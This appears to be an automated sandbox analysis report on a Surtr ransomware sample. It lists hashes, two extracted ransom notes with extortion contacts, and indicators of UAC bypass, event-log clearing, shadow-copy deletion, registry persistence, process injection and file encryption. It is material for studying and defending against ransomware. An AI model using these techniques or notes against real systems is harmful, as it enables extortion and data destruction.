surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-11-2022 14:02

221101-rckx8sddcn 10

24-12-2021 07:08

211224-hx8qcscee3 10

Analysis

max time kernel
128s
max time network
124s
platform
windows7_x64
resource
win7-en-20211208
submitted
24-12-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

surtr.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address DecryptMyData@mailfence.com use this ID( Mg7XhdqAg5vABo ) for the title of your email. if you weren't able to contact us within 24 hours please email : Decrypter@msgsafe.io Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

DecryptMyData@mailfence.com

Decrypter@msgsafe.io

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address DecryptMyData@mailfence.com use this ID (Mg7XhdqAg5vABo) for the title of your email . If you weren't able to contact us within 24 hours please email : Decrypter@msgsafe.io If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

DecryptMyData@mailfence.com

Decrypter@msgsafe.io

Signatures

Detects Surtr Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/956-60-0x0000000140133F50-mapping.dmp	family_surtr
behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
2844	wevtutil.exe
1364	wevtutil.exe
2748
3644	wevtutil.exe
1064	wevtutil.exe
3464	wevtutil.exe
3768	wevtutil.exe
4080
3484
3448	wevtutil.exe
3684	wevtutil.exe
2940
3252
3504
3836
1056	wevtutil.exe
3128	wevtutil.exe
2092	wevtutil.exe
2508	wevtutil.exe
3824	wevtutil.exe
3824	wevtutil.exe
3180	wevtutil.exe
2548	wevtutil.exe
812
2616
1608	wevtutil.exe
4092	wevtutil.exe
2132	wevtutil.exe
2764	wevtutil.exe
1588
3720	wevtutil.exe
1752
4040
3108
3104	wevtutil.exe
468	wevtutil.exe
1928	wevtutil.exe
4052
1532
2260
852	wevtutil.exe
3296
1016	wevtutil.exe
3628
3080
1676	wevtutil.exe
2468	wevtutil.exe
3964	wevtutil.exe
3640	wevtutil.exe
2892
3200	wevtutil.exe
3240
1860	wevtutil.exe
2040	wevtutil.exe
2056	wevtutil.exe
3676	wevtutil.exe
3208
2900
2832
3260
1928
3384	wevtutil.exe
3852	wevtutil.exe
2188	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3680 bcdedit.exe
3760 bcdedit.exe
Blocklisted process makes network request 5 IoCs

Processes:

flow pid process

6 3568
7 3568
9 3568
11 3568
13 3568
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
3680	bcdedit.exe
3760	bcdedit.exe

flow	pid	process
6	3568
7	3568
9	3568
11	3568
13	3568

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops startup file 7 IoCs

Processes:

cmd.execmd.execmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exesurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\K:	surtr.exe
File opened (read-only)	\??\W:	surtr.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\Q:	surtr.exe
File opened (read-only)	\??\X:	surtr.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Z:	surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\N:	surtr.exe
File opened (read-only)	\??\O:	surtr.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\Y:	surtr.exe
File opened (read-only)	\??\B:	surtr.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\L:	surtr.exe
File opened (read-only)	\??\P:	surtr.exe
File opened (read-only)	\??\R:	surtr.exe
File opened (read-only)	\??\T:	surtr.exe
File opened (read-only)	\??\V:	surtr.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\I:	surtr.exe
File opened (read-only)	\??\E:	surtr.exe
File opened (read-only)	\??\S:	surtr.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\U:	surtr.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\G:	surtr.exe
File opened (read-only)	\??\H:	surtr.exe
File opened (read-only)	\??\F:	surtr.exe
File opened (read-only)	\??\J:	surtr.exe
File opened (read-only)	\??\M:	surtr.exe
File opened (read-only)	\??\A:	surtr.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

surtr.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	surtr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

surtr.exe

description pid process target process

PID 1448 set thread context of 956 1448 surtr.exe surtr.exe

description	pid	process	target process
PID 1448 set thread context of 956	1448	surtr.exe	surtr.exe

Drops file in Program Files directory 64 IoCs

Processes:

surtr.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_pl.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\License.txt.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jfxmedia.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\msdarem.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\librotate_plugin.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Barbados.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\UTC.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_hu.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\javafx.policy.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\mshwgst.dll.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\ConvertToUnpublish.pps.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Maceio.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF.[DecryptMyData@mailfence.com].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT.[DecryptMyData@mailfence.com].SURT	surtr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

520
2704 schtasks.exe
3620 schtasks.exe

pid	process
520
2704	schtasks.exe
3620	schtasks.exe

Interacts with shadow copies 2 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2364	vssadmin.exe
2372	vssadmin.exe
2468	vssadmin.exe
2084	vssadmin.exe
2168	vssadmin.exe
2180	vssadmin.exe
2060	vssadmin.exe
2092	vssadmin.exe
2152	vssadmin.exe
2188	vssadmin.exe
2504	vssadmin.exe
1676	vssadmin.exe
2104	vssadmin.exe
2128	vssadmin.exe
2052	vssadmin.exe
888	vssadmin.exe
2332	vssadmin.exe
2112	vssadmin.exe
2140	vssadmin.exe
2412	vssadmin.exe
2204	vssadmin.exe
2380	vssadmin.exe
2480	vssadmin.exe
2488	vssadmin.exe
520	vssadmin.exe
1108	vssadmin.exe
2120	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main

Modifies registry class 5 IoCs

Processes:

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

pid process

3540
Runs net.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

surtr.exe

pid process

956 surtr.exe

pid	process
3540

pid	process
956	surtr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	2680	vssvc.exe
Token: SeRestorePrivilege	2680	vssvc.exe
Token: SeAuditPrivilege	2680	vssvc.exe
Token: SeSecurityPrivilege	4092	wevtutil.exe
Token: SeBackupPrivilege	4092	wevtutil.exe
Token: SeSecurityPrivilege	2360	wevtutil.exe
Token: SeBackupPrivilege	2360	wevtutil.exe
Token: SeSecurityPrivilege	2816	wevtutil.exe
Token: SeBackupPrivilege	2816	wevtutil.exe
Token: SeSecurityPrivilege	3220	wevtutil.exe
Token: SeBackupPrivilege	3220	wevtutil.exe
Token: SeSecurityPrivilege	2364	wevtutil.exe
Token: SeBackupPrivilege	2364	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2264	wevtutil.exe
Token: SeBackupPrivilege	2264	wevtutil.exe
Token: SeSecurityPrivilege	2392	wevtutil.exe
Token: SeBackupPrivilege	2392	wevtutil.exe
Token: SeSecurityPrivilege	2416	wevtutil.exe
Token: SeBackupPrivilege	2416	wevtutil.exe
Token: SeSecurityPrivilege	3376	wevtutil.exe
Token: SeBackupPrivilege	3376	wevtutil.exe
Token: SeSecurityPrivilege	3424	wevtutil.exe
Token: SeBackupPrivilege	3424	wevtutil.exe
Token: SeSecurityPrivilege	612	wevtutil.exe
Token: SeBackupPrivilege	612	wevtutil.exe
Token: SeSecurityPrivilege	1860	wevtutil.exe
Token: SeBackupPrivilege	1860	wevtutil.exe
Token: SeSecurityPrivilege	1280	wevtutil.exe
Token: SeBackupPrivilege	1280	wevtutil.exe
Token: SeSecurityPrivilege	2280	wevtutil.exe
Token: SeBackupPrivilege	2280	wevtutil.exe
Token: SeSecurityPrivilege	1640	wevtutil.exe
Token: SeBackupPrivilege	1640	wevtutil.exe
Token: SeSecurityPrivilege	1684	wevtutil.exe
Token: SeBackupPrivilege	1684	wevtutil.exe
Token: SeSecurityPrivilege	3324	wevtutil.exe
Token: SeBackupPrivilege	3324	wevtutil.exe
Token: SeSecurityPrivilege	3508	wevtutil.exe
Token: SeBackupPrivilege	3508	wevtutil.exe
Token: SeSecurityPrivilege	3532	wevtutil.exe
Token: SeBackupPrivilege	3532	wevtutil.exe
Token: SeSecurityPrivilege	3516	wevtutil.exe
Token: SeBackupPrivilege	3516	wevtutil.exe
Token: SeSecurityPrivilege	3548	wevtutil.exe
Token: SeBackupPrivilege	3548	wevtutil.exe
Token: SeSecurityPrivilege	3364	wevtutil.exe
Token: SeBackupPrivilege	3364	wevtutil.exe
Token: SeSecurityPrivilege	3576	wevtutil.exe
Token: SeBackupPrivilege	3576	wevtutil.exe
Token: SeSecurityPrivilege	3564	wevtutil.exe
Token: SeBackupPrivilege	3564	wevtutil.exe
Token: SeSecurityPrivilege	3644	wevtutil.exe
Token: SeBackupPrivilege	3644	wevtutil.exe
Token: SeSecurityPrivilege	3628	wevtutil.exe
Token: SeBackupPrivilege	3628	wevtutil.exe
Token: SeSecurityPrivilege	3720	wevtutil.exe
Token: SeBackupPrivilege	3720	wevtutil.exe
Token: SeSecurityPrivilege	3824	wevtutil.exe
Token: SeBackupPrivilege	3824	wevtutil.exe
Token: SeSecurityPrivilege	3800	wevtutil.exe
Token: SeBackupPrivilege	3800	wevtutil.exe
Token: SeSecurityPrivilege	3840	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

surtr.exesurtr.execmd.exe

description	pid	process	target process
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 1448 wrote to memory of 956	1448	surtr.exe	surtr.exe
PID 956 wrote to memory of 468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 524	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 524	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 524	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 360	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 360	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 360	956	surtr.exe	cmd.exe
PID 360 wrote to memory of 736	360	cmd.exe	chcp.com
PID 360 wrote to memory of 736	360	cmd.exe	chcp.com
PID 360 wrote to memory of 736	360	cmd.exe	chcp.com
